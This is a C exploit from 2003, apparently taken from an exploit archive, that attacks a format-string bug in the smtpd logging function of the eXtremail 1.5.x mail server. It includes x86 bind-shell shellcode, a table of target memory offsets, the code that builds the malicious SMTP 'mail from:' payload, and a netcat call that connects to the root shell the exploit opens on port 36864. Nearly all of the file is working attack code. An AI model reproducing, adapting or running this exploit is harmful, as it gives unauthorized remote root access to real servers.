276 lines
No EOL
6.5 KiB
C
276 lines
No EOL
6.5 KiB
C
/****************************************************************/
|
|
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
|
|
/* */
|
|
/* */
|
|
/* By B-r00t - 02/07/2003 */
|
|
/* */
|
|
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
|
|
/* Linux eXtremail-1.5-5 => VULNERABLE */
|
|
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
|
|
/* r00tshell to port 36864 on the target eXtremail server. */
|
|
/* */
|
|
/****************************************************************/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <unistd.h>
|
|
|
|
#define EXPLOIT "eXtreme"
|
|
#define DEST_PORT 25
|
|
|
|
// Prototypes
|
|
int get_sock (char *host);
|
|
int send_sock (char *stuff);
|
|
int read_sock (void);
|
|
void usage (void);
|
|
int do_it (void);
|
|
|
|
// Globals
|
|
int socketfd, choice;
|
|
unsigned long GOT, RET;
|
|
char *myip;
|
|
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
|
|
char shellcode[] =
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
|
|
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
|
|
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
|
|
"\x80\x43\xc6\x46\x10\x10\x88\x46"
|
|
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
|
|
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
|
|
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
|
|
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
|
|
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
|
|
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
|
|
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
|
|
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
|
|
"\x80\x88\x56\x07\x89\x76\x0c\x87"
|
|
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
|
|
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
|
|
"\x6e\x2f\x73\x68";
|
|
|
|
|
|
struct {
|
|
char *systemtype;
|
|
unsigned long got;
|
|
unsigned long ret;
|
|
int pad;
|
|
int buf;
|
|
int pos;
|
|
} targets[] = {
|
|
// Confirmed targets tested by B-r00t.
|
|
{ "RedHat 7.2 eXtremail V1.5 release 5
|
|
(eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
|
|
{ "Linux ANY eXtremail V1.5 release 5
|
|
(eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
|
|
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8,
|
|
0xbefff1d4, 1, 266, 44},
|
|
{ "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266,
|
|
44},
|
|
{ 0 }
|
|
};
|
|
|
|
int main ( int argc, char *argv[] )
|
|
{
|
|
char *TARGET = "TARGET";
|
|
|
|
printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n",
|
|
EXPLOIT);
|
|
|
|
if (argc < 3)
|
|
usage ();
|
|
|
|
choice = atoi(argv[2]);
|
|
if (choice < 0 || choice > 3)
|
|
usage ();
|
|
|
|
setenv (TARGET, argv[1], 1);
|
|
|
|
get_sock(argv[1]);
|
|
sleep (1);
|
|
read_sock ();
|
|
sleep (1);
|
|
send_sock (helo);
|
|
sleep (1);
|
|
read_sock ();
|
|
sleep(1);
|
|
do_it ();
|
|
}
|
|
|
|
|
|
void usage (void)
|
|
{
|
|
int loop;
|
|
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
|
|
printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
|
|
for (loop = 0; targets[loop].systemtype; loop++)
|
|
printf ("\n%d\t%s", loop, targets[loop].systemtype);
|
|
printf ("\n\nOn success a r00tshell will be spawned on port
|
|
36864.\n\n");
|
|
exit (-1);
|
|
}
|
|
|
|
|
|
int get_sock (char *host)
|
|
{
|
|
struct sockaddr_in dest_addr;
|
|
|
|
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
|
|
perror("Socket Error!\n");
|
|
exit (-1);
|
|
}
|
|
|
|
dest_addr.sin_family = AF_INET;
|
|
dest_addr.sin_port = htons(DEST_PORT);
|
|
if (! inet_aton(host, &(dest_addr.sin_addr))) {
|
|
perror("inet_aton problems\n");
|
|
exit (-2);
|
|
}
|
|
|
|
memset( &(dest_addr.sin_zero), '\0', 8);
|
|
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
|
|
sockaddr)) == -1){
|
|
perror("Connect failed!\n");
|
|
close (socketfd);
|
|
exit (-3);
|
|
}
|
|
printf ("\n\nConnected to %s\n", host);
|
|
}
|
|
|
|
|
|
|
|
int send_sock (char *stuff)
|
|
{
|
|
int bytes;
|
|
bytes = (send (socketfd, stuff, strlen(stuff), 0));
|
|
if (bytes == -1) {
|
|
perror("Send error");
|
|
close (socketfd);
|
|
exit(4);
|
|
}
|
|
printf ("Send:\t%s", stuff);
|
|
return bytes;
|
|
}
|
|
|
|
|
|
int read_sock (void)
|
|
{
|
|
int bytes;
|
|
char buffer[200];
|
|
char *ptr;
|
|
ptr = buffer;
|
|
memset (buffer, '\0', sizeof(buffer));
|
|
bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
|
|
if (bytes == -1) {
|
|
perror("send error");
|
|
close (socketfd);
|
|
exit(4);
|
|
}
|
|
printf ("Recv:\t%s", buffer);
|
|
return bytes;
|
|
}
|
|
|
|
|
|
int do_it (void)
|
|
{
|
|
char format[200], buf[500], *bufptr, *p;
|
|
int loop, sofar = 0;
|
|
int PAD = targets[choice].pad;
|
|
int POS = targets[choice].pos;
|
|
unsigned char r[3], g[3], w[3];
|
|
|
|
RET = targets[choice].ret;
|
|
r[0] = (int) (RET & 0x000000ff);
|
|
r[1] = (int)((RET & 0x0000ff00) >> 8);
|
|
r[2] = (int)((RET & 0x00ff0000) >> 16);
|
|
r[3] = (int)((RET & 0xff000000) >> 24);
|
|
|
|
GOT = targets[choice].got;
|
|
g[0] = (int) (GOT & 0x000000ff);
|
|
g[1] = (int)((GOT & 0x0000ff00) >> 8);
|
|
g[2] = (int)((GOT & 0x00ff0000) >> 16);
|
|
g[3] = (int)((GOT & 0xff000000) >> 24);
|
|
|
|
|
|
// Start buf
|
|
bufptr = buf;
|
|
bzero (bufptr, sizeof(buf));
|
|
strncpy (buf, "mail from: ", strlen("mail from: "));
|
|
sofar = 19;
|
|
|
|
// Do padding
|
|
for (loop=0; loop<PAD; loop++)
|
|
strncat (buf, "a", 1);
|
|
sofar = sofar+PAD;
|
|
|
|
//1st GOT addy
|
|
strncat (buf, g, 4);
|
|
|
|
//2nd GOT addy
|
|
p = &g[0];
|
|
(*p)++;
|
|
strncat (buf, g, 4);
|
|
|
|
// 3rd GOT addy
|
|
p = &g[0];
|
|
(*p)++;
|
|
strncat (buf, g, 4);
|
|
|
|
// 4th GOT addy
|
|
p = &g[0];
|
|
(*p)++;
|
|
strncat (buf, g, 4);
|
|
sofar = sofar+16;
|
|
|
|
for (loop=0; loop<4; loop++) {
|
|
if (r[loop] > sofar) {
|
|
w[loop] = r[loop]-sofar;
|
|
} else
|
|
if (r[loop] == sofar) {
|
|
w[loop] = 0;
|
|
}else
|
|
if (r[loop] < sofar) {
|
|
w[loop] = (256-sofar)+r[loop];
|
|
}
|
|
sofar = sofar+w[loop];
|
|
}
|
|
|
|
bufptr = format;
|
|
bzero (bufptr, sizeof(format));
|
|
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
|
|
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
|
|
strncat (buf, format, sizeof(format));
|
|
strncat (buf, shellcode, sizeof(shellcode));
|
|
|
|
// Summarise
|
|
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
|
|
printf ("\nWrite Addy:\t\t0x%x", GOT);
|
|
printf ("\nRET (shellcode):\t0x%x", RET);
|
|
printf ("\nPAD (alignment):\t%d", PAD);
|
|
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
|
|
targets[choice].buf);
|
|
printf ("\nSending it ... \n");
|
|
sleep(1);
|
|
|
|
// Ok lets Wack it!
|
|
send_sock (buf);
|
|
sleep (1);
|
|
close (socketfd);
|
|
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
|
|
....!!!!!\n\n\n");
|
|
sleep(3); // May take time to spawn a shell
|
|
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
|
|
exit (0);
|
|
}
|
|
|
|
// milw0rm.com [2003-07-02]
|